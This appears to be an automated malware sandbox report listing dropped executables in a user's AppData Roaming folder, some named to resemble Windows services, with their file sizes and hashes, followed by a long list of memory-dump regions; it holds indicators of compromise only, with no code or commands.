2f55a4df8314ecf86a36a38bb76af6f4663ecd0b02639c3c071247c93054f8ae

SHA512
74c07dcccaf4c1a8823a345c627932c7f9845b224f71983d17cd162c247e1a16e62c820615e3929a12ef708d13d06d4b9309f12e7b082439fe3e3df81d7ef3b2

Download Submit
C:\Users\Admin\AppData\Roaming\5.exe
Filesize
68KB

MD5
b2039684208ca1a2c62b998de4c60917

SHA1
8c287a28c0aa74ccfa239d9af9611a3be1f39467

SHA256
5629471239d4e9ef5585ea8ee2707cb6d029a62f834e02d2110657bc30842638

SHA512
7f73b48457f3e0428b9c19228141521a6b867e15741822094701d967da9e783ff69f6b56fc808cb15e33fa1789796c4ff0f3ed719faf4a25becda5e831a41d55

Download Submit
C:\Users\Admin\AppData\Roaming\5.exe
Filesize
68KB

MD5
b2039684208ca1a2c62b998de4c60917

SHA1
8c287a28c0aa74ccfa239d9af9611a3be1f39467

SHA256
5629471239d4e9ef5585ea8ee2707cb6d029a62f834e02d2110657bc30842638

SHA512
7f73b48457f3e0428b9c19228141521a6b867e15741822094701d967da9e783ff69f6b56fc808cb15e33fa1789796c4ff0f3ed719faf4a25becda5e831a41d55

Download Submit
C:\Users\Admin\AppData\Roaming\6.exe
Filesize
14.7MB

MD5
3a4c21bae568edec1f177b3300c94e2c

SHA1
86b4c8a4ce2fecbaa1a94094479ed94aa39fb90d

SHA256
771a430d351c7c474295ddbe2bcffb1e0d4e727ea8c5d41425c82954969f6122

SHA512
c75234286540331e178e3645bd78ccdc96ec6ffa01c6c4713989cdfd999241fb311a305d22c77af62ce645a7d2d0b25055011a6492925cbdab7e96f58cfa5113

Download Submit
C:\Users\Admin\AppData\Roaming\6.exe
Filesize
14.7MB

MD5
3a4c21bae568edec1f177b3300c94e2c

SHA1
86b4c8a4ce2fecbaa1a94094479ed94aa39fb90d

SHA256
771a430d351c7c474295ddbe2bcffb1e0d4e727ea8c5d41425c82954969f6122

SHA512
c75234286540331e178e3645bd78ccdc96ec6ffa01c6c4713989cdfd999241fb311a305d22c77af62ce645a7d2d0b25055011a6492925cbdab7e96f58cfa5113

Download Submit
C:\Users\Admin\AppData\Roaming\7.exe
Filesize
4.2MB

MD5
3a913788543de3db4e3e783bdbf9aea4

SHA1
328356b34150c847cd3a13c48669b8f3927943d2

SHA256
6c1a998b347416c733619dfee30c93822cbe28b6fdd729d8bbe29697d06c4594

SHA512
85ebf8a2c9457bb8780df427ccc4bec16dab2fb24e1a1019be2a80291d1f666f22074318e2fa685299dc080ffdc1214b00dbe23d28b913e5ffbd9cca77e981dc

Download Submit
C:\Users\Admin\AppData\Roaming\7.exe
Filesize
4.2MB

MD5
3a913788543de3db4e3e783bdbf9aea4

SHA1
328356b34150c847cd3a13c48669b8f3927943d2

SHA256
6c1a998b347416c733619dfee30c93822cbe28b6fdd729d8bbe29697d06c4594

SHA512
85ebf8a2c9457bb8780df427ccc4bec16dab2fb24e1a1019be2a80291d1f666f22074318e2fa685299dc080ffdc1214b00dbe23d28b913e5ffbd9cca77e981dc

Download Submit
C:\Users\Admin\AppData\Roaming\8.exe
Filesize
1006KB

MD5
f87fd290c2d08ede25d6a8def9657c07

SHA1
930e7f35e0d5a43faf19ad75bc41c7efce914a17

SHA256
a9b2a465ca8b372a9067d8cc4f6ce6404e2501177f5499d343ca88c0bc4665cf

SHA512
0093b13ab44468c67aceadb04d4cdbbb7486737e8aa0a6aff8e662c308100a6d3bdf4f1cdc630e00d701fa8ec79ed89a8d31ed325bf2c6f05797742aae09db07

Download Submit
C:\Users\Admin\AppData\Roaming\8.exe
Filesize
1006KB

MD5
f87fd290c2d08ede25d6a8def9657c07

SHA1
930e7f35e0d5a43faf19ad75bc41c7efce914a17

SHA256
a9b2a465ca8b372a9067d8cc4f6ce6404e2501177f5499d343ca88c0bc4665cf

SHA512
0093b13ab44468c67aceadb04d4cdbbb7486737e8aa0a6aff8e662c308100a6d3bdf4f1cdc630e00d701fa8ec79ed89a8d31ed325bf2c6f05797742aae09db07

Download Submit
C:\Users\Admin\AppData\Roaming\9.exe
Filesize
4.2MB

MD5
b60e44033994d1fde9a4b6f1338bfa04

SHA1
7f2cd8091276040ca011174269112099ec3e9bef

SHA256
baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e

SHA512
a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574

Download Submit
C:\Users\Admin\AppData\Roaming\9.exe
Filesize
4.2MB

MD5
b60e44033994d1fde9a4b6f1338bfa04

SHA1
7f2cd8091276040ca011174269112099ec3e9bef

SHA256
baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e

SHA512
a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574

Download Submit
C:\Users\Admin\AppData\Roaming\HJDS32.EXE
Filesize
532KB

MD5
89d77a6e1e3a08f6cbb5b440c8f47e29

SHA1
b9f2db35241435b4ceed98b58b63918a6f4ce2e2

SHA256
9f6badc3fdae2eec00ce41e5c07ccaef97eb9805d13328a1589e36fd1890181c

SHA512
c6102fd3cc8438292a222583f40358e2039fab534765ed2f07e056df36c8f609ef51b55c782baaeeb1d2124b3aed5ebfbb9875dc136e560220a8339393c594e2

Download Submit
C:\Users\Admin\AppData\Roaming\HJDS32.EXE
Filesize
532KB

MD5
89d77a6e1e3a08f6cbb5b440c8f47e29

SHA1
b9f2db35241435b4ceed98b58b63918a6f4ce2e2

SHA256
9f6badc3fdae2eec00ce41e5c07ccaef97eb9805d13328a1589e36fd1890181c

SHA512
c6102fd3cc8438292a222583f40358e2039fab534765ed2f07e056df36c8f609ef51b55c782baaeeb1d2124b3aed5ebfbb9875dc136e560220a8339393c594e2

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe
Filesize
87KB

MD5
416111b00225448d637271b38b2ced81

SHA1
31cb7553da6fbf930630cafac8a8c99286970dc2

SHA256
2f55a4df8314ecf86a36a38bb76af6f4663ecd0b02639c3c071247c93054f8ae

SHA512
74c07dcccaf4c1a8823a345c627932c7f9845b224f71983d17cd162c247e1a16e62c820615e3929a12ef708d13d06d4b9309f12e7b082439fe3e3df81d7ef3b2

Download Submit
C:\Users\Admin\AppData\Roaming\WHost\WHost.exe
Filesize
87KB

MD5
2b886cf83705877c1fae3a07a6c4339e

SHA1
e37e62c7fda4f467e4ae7dbba04d631f08a5a3dd

SHA256
8d0c4f891f01840c2a9c6483554d661440bb6a81fe86f10d546c697fb9e958a5

SHA512
a70165c38ade58ea1c2b9b20dba717364d4062735b63b00af4cc6adea967df9bc0a8be98c5b8ae4a9a968661e0ccc48fdb4c7d5c75e5c4303131e4e175a0a7b2

Download Submit
C:\Users\Admin\AppData\Roaming\yQKALotXEZ\wXDStJGKiy.exe
Filesize
68KB

MD5
b2039684208ca1a2c62b998de4c60917

SHA1
8c287a28c0aa74ccfa239d9af9611a3be1f39467

SHA256
5629471239d4e9ef5585ea8ee2707cb6d029a62f834e02d2110657bc30842638

SHA512
7f73b48457f3e0428b9c19228141521a6b867e15741822094701d967da9e783ff69f6b56fc808cb15e33fa1789796c4ff0f3ed719faf4a25becda5e831a41d55

Download Submit
\??\c:\users\admin\appdata\roaming\5.exe
Filesize
68KB

MD5
b2039684208ca1a2c62b998de4c60917

SHA1
8c287a28c0aa74ccfa239d9af9611a3be1f39467

SHA256
5629471239d4e9ef5585ea8ee2707cb6d029a62f834e02d2110657bc30842638

SHA512
7f73b48457f3e0428b9c19228141521a6b867e15741822094701d967da9e783ff69f6b56fc808cb15e33fa1789796c4ff0f3ed719faf4a25becda5e831a41d55

Download Submit
memory/512-171-0x0000000000000000-mapping.dmp

Download
memory/1028-213-0x0000000000000000-mapping.dmp

Download
memory/1028-241-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/1036-133-0x0000000000000000-mapping.dmp

Download
memory/1276-264-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/1276-252-0x0000000000000000-mapping.dmp

Download
memory/1304-324-0x0000000000000000-mapping.dmp

Download
memory/1316-212-0x0000000000240000-0x0000000000248000-memory.dmp

Filesize
32KB

Download
memory/1316-208-0x0000000000000000-mapping.dmp

Download
memory/1316-227-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/1344-188-0x0000000000000000-mapping.dmp

Download
memory/1396-173-0x0000000000000000-mapping.dmp

Download
memory/1480-132-0x0000000000600000-0x00000000006AA000-memory.dmp

Filesize
680KB

Download
memory/1592-233-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/1592-218-0x00000000009D0000-0x00000000009D8000-memory.dmp

Filesize
32KB

Download
memory/1592-228-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/1592-214-0x0000000000000000-mapping.dmp

Download
memory/1608-152-0x0000000000000000-mapping.dmp

Download
memory/1608-155-0x0000000000AD0000-0x0000000000AF6000-memory.dmp

Filesize
152KB

Download
memory/1628-253-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/1628-229-0x0000000000000000-mapping.dmp

Download
memory/1652-260-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/1652-247-0x00000000006D0000-0x00000000006D8000-memory.dmp

Filesize
32KB

Download
memory/1652-242-0x0000000000000000-mapping.dmp

Download
memory/1688-322-0x0000000000000000-mapping.dmp

Download
memory/1804-232-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/1804-196-0x0000000000000000-mapping.dmp

Download
memory/2012-146-0x00007FF71DB30000-0x00007FF71DC8F000-memory.dmp

Filesize
1.4MB

Download
memory/2012-143-0x00007FF71DB30000-0x00007FF71DC8F000-memory.dmp

Filesize
1.4MB

Download
memory/2012-140-0x0000000000000000-mapping.dmp

Download
memory/2236-193-0x0000000000C10000-0x0000000000C18000-memory.dmp

Filesize
32KB

Download
memory/2236-207-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/2236-199-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/2236-190-0x0000000000000000-mapping.dmp

Download
memory/2264-136-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/2264-135-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/2264-134-0x0000000000000000-mapping.dmp

Download
memory/2264-137-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/2264-139-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/2264-144-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/2280-332-0x0000000000000000-mapping.dmp

Download
memory/2468-172-0x0000000000000000-mapping.dmp

Download
memory/2468-272-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/2468-183-0x000002033EF90000-0x000002033EFB2000-memory.dmp

Filesize
136KB

Download
memory/2468-206-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/2640-167-0x0000000000000000-mapping.dmp

Download
memory/2640-170-0x0000000000F00000-0x0000000000F08000-memory.dmp

Filesize
32KB

Download
memory/2640-181-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/2652-251-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/2652-201-0x0000000000000000-mapping.dmp

Download
memory/2652-237-0x0000000000040000-0x0000000000048000-memory.dmp

Filesize
32KB

Download
memory/2652-231-0x0000000000000000-mapping.dmp

Download
memory/2652-219-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/2652-254-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/2652-204-0x0000000000EB0000-0x0000000000EB8000-memory.dmp

Filesize
32KB

Download
memory/2704-151-0x0000000000000000-mapping.dmp

Download
memory/2716-326-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2716-325-0x0000000000000000-mapping.dmp

Download
memory/2744-161-0x0000000000000000-mapping.dmp

Download
memory/2744-166-0x0000000000E20000-0x0000000000E28000-memory.dmp

Filesize
32KB

Download
memory/2744-174-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/3164-200-0x0000000000000000-mapping.dmp

Download
memory/3404-274-0x0000000006590000-0x0000000006606000-memory.dmp

Filesize
472KB

Download
memory/3404-281-0x0000000006880000-0x000000000689E000-memory.dmp

Filesize
120KB

Download
memory/3404-261-0x00000000068B0000-0x0000000006DDC000-memory.dmp

Filesize
5.2MB

Download
memory/3404-262-0x0000000006140000-0x00000000061A6000-memory.dmp

Filesize
408KB

Download
memory/3404-187-0x0000000005150000-0x000000000525A000-memory.dmp

Filesize
1.0MB

Download
memory/3404-259-0x00000000061B0000-0x0000000006372000-memory.dmp

Filesize
1.8MB

Download
memory/3404-159-0x0000000005400000-0x0000000005A18000-memory.dmp

Filesize
6.1MB

Download
memory/3404-266-0x0000000007390000-0x0000000007934000-memory.dmp

Filesize
5.6MB

Download
memory/3404-157-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3404-156-0x0000000000000000-mapping.dmp

Download
memory/3404-160-0x0000000004E40000-0x0000000004E52000-memory.dmp

Filesize
72KB

Download
memory/3404-277-0x00000000066B0000-0x0000000006742000-memory.dmp

Filesize
584KB

Download
memory/3404-165-0x0000000004EA0000-0x0000000004EDC000-memory.dmp

Filesize
240KB

Download
memory/3408-164-0x0000000000000000-mapping.dmp

Download
memory/3412-371-0x0000000000000000-mapping.dmp

Download
memory/3412-195-0x0000000000000000-mapping.dmp

Download
memory/3412-372-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3508-186-0x00000000009B0000-0x00000000009B8000-memory.dmp

Filesize
32KB

Download
memory/3508-198-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/3508-182-0x0000000000000000-mapping.dmp

Download
memory/3552-205-0x0000000000000000-mapping.dmp

Download
memory/3552-239-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/3824-376-0x0000000000000000-mapping.dmp

Download
memory/4016-180-0x0000000000000000-mapping.dmp

Download
memory/4192-158-0x0000000000000000-mapping.dmp

Download
memory/4216-230-0x0000000000000000-mapping.dmp

Download
memory/4292-145-0x0000000000000000-mapping.dmp

Download
memory/4360-244-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/4360-220-0x0000000000000000-mapping.dmp

Download
memory/4520-263-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/4520-236-0x0000000000000000-mapping.dmp

Download
memory/4532-224-0x0000000000100000-0x0000000000108000-memory.dmp

Filesize
32KB

Download
memory/4532-240-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/4532-221-0x0000000000000000-mapping.dmp

Download
memory/4564-317-0x0000000000000000-mapping.dmp

Download
memory/4652-209-0x0000000000000000-mapping.dmp

Download
memory/4772-329-0x0000000000000000-mapping.dmp

Download
memory/4784-250-0x00000000007C0000-0x00000000007C8000-memory.dmp

Filesize
32KB

Download
memory/4784-243-0x0000000000000000-mapping.dmp

Download
memory/4784-255-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/4784-258-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/4792-179-0x0000000000230000-0x0000000000238000-memory.dmp

Filesize
32KB

Download
memory/4792-175-0x0000000000000000-mapping.dmp

Download
memory/4792-194-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/4816-215-0x0000000000000000-mapping.dmp

Download
memory/4836-352-0x0000000000000000-mapping.dmp

Download
memory/4896-197-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/4896-178-0x0000000000000000-mapping.dmp

Download
memory/4968-238-0x00007FF68BF60000-0x00007FF68C0C1000-memory.dmp

Filesize
1.4MB

Download
memory/4968-150-0x00007FF68BF60000-0x00007FF68C0C1000-memory.dmp

Filesize
1.4MB

Download
memory/4968-147-0x0000000000000000-mapping.dmp

Download
memory/5036-189-0x0000000000000000-mapping.dmp

Download
memory/5036-226-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/5060-225-0x0000000000000000-mapping.dmp

Download
memory/5144-358-0x0000000000000000-mapping.dmp

Download
memory/5180-310-0x0000000000000000-mapping.dmp

Download
memory/5216-365-0x0000000000000000-mapping.dmp

Download
memory/5244-256-0x0000000000000000-mapping.dmp

Download
memory/5244-265-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/5280-257-0x0000000000000000-mapping.dmp

Download
memory/5280-267-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmp

Filesize
10.8MB

Download
memory/5496-388-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/5528-380-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/5868-344-0x0000000000000000-mapping.dmp

Download
memory/5868-268-0x0000000000000000-mapping.dmp

Download
memory/5868-271-0x0000000000670000-0x000000000068C000-memory.dmp

Filesize
112KB

Download
memory/5916-350-0x0000000000000000-mapping.dmp

Download
memory/5920-279-0x0000000004780000-0x00000000047B6000-memory.dmp

Filesize
216KB

Download
memory/5920-273-0x0000000000000000-mapping.dmp

Download
memory/5920-282-0x0000000004DF0000-0x0000000005418000-memory.dmp

Filesize
6.2MB

Download
memory/5948-340-0x0000000000000000-mapping.dmp

Download
memory/5960-275-0x0000000000000000-mapping.dmp

Download
memory/5984-278-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/5984-276-0x0000000000000000-mapping.dmp

Download
memory/6096-280-0x0000000000000000-mapping.dmp

Download